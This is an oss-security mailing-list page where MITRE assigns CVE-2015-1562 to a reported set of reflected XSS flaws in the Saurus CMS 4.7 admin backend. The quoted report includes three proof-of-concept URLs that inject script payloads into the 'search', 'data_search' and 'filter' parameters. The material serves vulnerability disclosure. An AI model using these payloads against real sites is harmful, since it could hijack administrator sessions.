Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Sun, 8 Feb 2015 22:35:52 -0500 (EST)
From: cve-assign@...re.org
To: Steffen Rösemann <steffen.roesemann1986@...il.com>
cc: oss-security@...ts.openwall.com, cve-assign@...re.org
Subject: Re: CVE-Request -- Saurus CMS v.4.7 (Community Edition,
 released: 12.08.2014) -- Multiple reflecting XSS vulnerabilities


> I found multiple reflecting XSS vulnerabilities in the administrative
> backend of the content management system Saurus CMS v. 4.7 (Community
> Edition, released: 12.08.2014).
>
> The parameters used in the following PHP files are prone to reflecting XSS
> attacks (including exploit examples):
>
> user_management.php (vulnerable parameter: "search"):
>
> http://
> {TARGET}/admin/user_management.php?tmpuser_search=1&tmpgroup_search=1&tmpsearch_subtree=1&search=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C!--&user_search=1&group_search=1&group_search=1&flt_role=&keepThis=true&id=&op=&keel=&group_id=1&view=overview_false&user_id=&user_prev_id=&user_next_id=
>
> profile_data.php (vulnerable parameter: "data_search"):
>
> http://
> {TARGET}/admin/profile_data.php?data_search=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C!--&profile_search=&profile_id=0
>
> error_log.php (vulnerable parameter: "filter"):
>
> http://
> {TARGET}/admin/error_log.php?id=&op=&keel=&group_id=1&otsi=1&page=&filter=bla&algus=31.12.2014&lopp=07.01.2015&err_type=&otsi=1&page=&filter=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%3C!--&algus=31.12.2014&lopp=07.01.2015&err_type=
>
> Vendor patched this vulnerability in the latest commit of Saurus CMS v. 4.7
> (CE, released: 27.01.2015).
>
> Could you please assign a CVE-ID for this?


Use CVE-2015-1562.

---

CVE assignment team, MITRE CVE Numbering Authority M/S M300
202 Burlington Road, Bedford, MA 01730 USA
[ PGP key available through http://cve.mitre.org/cve/request_id.html ]

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ